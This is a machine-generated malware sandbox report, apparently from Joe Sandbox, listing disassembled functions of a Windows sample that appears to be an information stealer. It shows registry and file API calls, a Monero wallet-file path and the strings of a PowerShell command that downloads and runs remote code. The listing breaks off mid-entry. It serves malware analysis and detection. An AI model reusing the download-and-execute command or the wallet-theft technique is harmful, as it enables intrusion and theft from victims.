                  • Instruction ID: c9191ce28dcde15e7f99c27c464ecfd647659feaa98351cd91e11e7466f54bd5
                  • Opcode Fuzzy Hash: 812bbeb03f9cd527e3312c4ad14048cd60c6c5f19410beb2601ccdf5360d65dd
                  • Instruction Fuzzy Hash: E531E6B4A40218ABDB20CF54DC85BDDB7B4EB48704F1081D9EA09B7281DAB46E858F99
                  Function 009383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00938426
                  • wsprintfA.USER32 ref: 00938459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0093847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0093848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00938499
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0105DE78,00000000,000F003F,?,00000400), ref: 009384EC
                  • lstrlen.KERNEL32(?), ref: 00938501
                  • RegQueryValueExA.ADVAPI32(00000000,0105DE48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00940B34), ref: 00938599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00938608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0093861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 8c2456391c06deef7af23be6feb5dac934a1a648d3b9ea69f235db027ca72a7c
                  • Instruction ID: f865eb39999f6c38296836612bd85990cee589931772a83f0dbd64339a230731
                  • Opcode Fuzzy Hash: 8c2456391c06deef7af23be6feb5dac934a1a648d3b9ea69f235db027ca72a7c
                  • Instruction Fuzzy Hash: 8F21E7B1910218ABDB24DB54DC85FE9B3B8FB88704F00C598E609A7180DF75AA85CFD4
                  Function 00937690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009376A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009376AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0104BA08,00000000,00020119,00000000), ref: 009376DD
                  • RegQueryValueExA.ADVAPI32(00000000,0105DE18,00000000,00000000,?,000000FF), ref: 009376FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00937708
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: a28798df56fb0e181b22e434e2851ba0d6facce5a666bddb815e7b86a8afc337
                  • Instruction ID: 4ac8724752521ee154a17441054bf3ae71770d25fc98ad3cf40f1e62994c0ebb
                  • Opcode Fuzzy Hash: a28798df56fb0e181b22e434e2851ba0d6facce5a666bddb815e7b86a8afc337
                  • Instruction Fuzzy Hash: 75014FB5A04208BBDB10DBE4DD49F69B7BCEB48701F104454FA05A72D1EAB899008F52
                  Function 00937720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0093773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0104BA08,00000000,00020119,009376B9), ref: 0093775B
                  • RegQueryValueExA.ADVAPI32(009376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0093777A
                  • RegCloseKey.ADVAPI32(009376B9), ref: 00937784
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: fa865f44ef6c1a63bb833693f231fa893c01eb02212dc8eb263e5c80dfbd34cb
                  • Instruction ID: 77aede2e0d0afaa246edac354af8a44b64e26a35e1c63519bc7623da698c1a89
                  • Opcode Fuzzy Hash: fa865f44ef6c1a63bb833693f231fa893c01eb02212dc8eb263e5c80dfbd34cb
                  • Instruction Fuzzy Hash: 0F01F4B5A40308BBDB10DBE4DC4AFAEB7B8EB44705F104555FA05A72C1DAB469008F51
                  Function 009340B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 009340D5
                  • RegOpenKeyExA.ADVAPI32(80000001,0105D9D8,00000000,00020119,?), ref: 009340F4
                  • RegQueryValueExA.ADVAPI32(?,0105EB00,00000000,00000000,00000000,000000FF), ref: 00934118
                  • RegCloseKey.ADVAPI32(?), ref: 00934122
                  • lstrcat.KERNEL32(?,00000000), ref: 00934147
                  • lstrcat.KERNEL32(?,0105EB90), ref: 0093415B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: 27d7b4c301b048db4504cc3532d401fdb754cb8c6dc83aad6b3414b1ea7f6e2a
                  • Instruction ID: c36713559e266aa81ceec45b1eee345cd2c64a03f3272ecc32e079c30a51b1c6
                  • Opcode Fuzzy Hash: 27d7b4c301b048db4504cc3532d401fdb754cb8c6dc83aad6b3414b1ea7f6e2a
                  • Instruction Fuzzy Hash: 5F4148B69101086BDF24EBA0EC56FFE737DAB98300F404558B616571C1EEB95B888FD2
                  Function 009299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                  • LocalFree.KERNEL32(0092148F), ref: 00929A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 61ed2886a69b73b9bb1f51209b05967e6b4d3b22df94b354345ac1678d22344f
                  • Instruction ID: f75927dd7689228d5e24d63e667902449e0cae48c116a4f9b3256e3c556283a0
                  • Opcode Fuzzy Hash: 61ed2886a69b73b9bb1f51209b05967e6b4d3b22df94b354345ac1678d22344f
                  • Instruction Fuzzy Hash: AC3106B4A00309EFDF14CFA4D995BAE77B9FF48340F108158E911A7294DB78AA41CFA1
                  Function 0093C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: 420c054d05d0980a9238c57ed84f84f3f27f867d4403ef2c3b5d1b763bf214a3
                  • Instruction ID: 0db552c060926a714a2873f2c6508a8cc9e9816bbc1fed04609c228229efab5d
                  • Opcode Fuzzy Hash: 420c054d05d0980a9238c57ed84f84f3f27f867d4403ef2c3b5d1b763bf214a3
                  • Instruction Fuzzy Hash: D941F5B1100B9C5EDB218B24CC95FFBBBED9F45704F1448E8E9CAA6182D2719A449F20
                  Function 00934780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,0105E360), ref: 009347DB
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00934801
                  • lstrcat.KERNEL32(?,?), ref: 00934820
                  • lstrcat.KERNEL32(?,?), ref: 00934834
                  • lstrcat.KERNEL32(?,0104AEA0), ref: 00934847
                  • lstrcat.KERNEL32(?,?), ref: 0093485B
                  • lstrcat.KERNEL32(?,0105D978), ref: 0093486F
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 00938D90: GetFileAttributesA.KERNEL32(00000000,?,00921B54,?,?,0094564C,?,?,00940E1F), ref: 00938D9F
                    • Part of subcall function 00934570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00934580
                    • Part of subcall function 00934570: RtlAllocateHeap.NTDLL(00000000), ref: 00934587
                    • Part of subcall function 00934570: wsprintfA.USER32 ref: 009345A6
                    • Part of subcall function 00934570: FindFirstFileA.KERNEL32(?,?), ref: 009345BD
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: c11e36e89733e456985402a478de5f173ee9cb37d9366223bd57218b2cc812c9
                  • Instruction ID: 7a2c378e54c70493f71b58f6a6fbd6e30555a5ac48381ed7b1f0aaadfaa9aa85
                  • Opcode Fuzzy Hash: c11e36e89733e456985402a478de5f173ee9cb37d9366223bd57218b2cc812c9
                  • Instruction Fuzzy Hash: 663132B290031867CB14F7A0DC85FEE737DAB98700F404989B355A7191EEB4E6898F95
                  Function 00932C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00932D85
                  Strings
                  • ')", xrefs: 00932CB3
                  • <, xrefs: 00932D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00932CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00932D04
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 0367fa8896eb5e8190f52c8cb9f7e701b04785f45337c775b383d592ceb9b1bc
                  • Instruction ID: d04e16952a0a322c208634e46fd9d24155deecdb23a0aca1d2fdb8ff0f6017b4
                  • Opcode Fuzzy Hash: 0367fa8896eb5e8190f52c8cb9f7e701b04785f45337c775b383d592ceb9b1bc
                  • Instruction Fuzzy Hash: 7A41AF71D10208AADB14FFA0C892FEEB778AF94300F504119F156B7192EF746A4ACF96
                  Function 00929E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00929F41
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 045348c1716ff297388cca2bcc30f15712958da239f24a6392de6dd4592fd9f9
                  • Instruction ID: 770f55b829f200856fa7ebf66c54a4ec5bb5d824f870b36bf333142943ca1f7d
                  • Opcode Fuzzy Hash: 045348c1716ff297388cca2bcc30f15712958da239f24a6392de6dd4592fd9f9
                  • Instruction Fuzzy Hash: A6615E71A00218AFDB24EFA4DC96FEE7779AF85304F008018F90A5F195EB746A05CF92
                  Function 00936920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0093696C
                  • sscanf.NTDLL ref: 00936999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009369B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009369C0
                  • ExitProcess.KERNEL32 ref: 009369DA
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
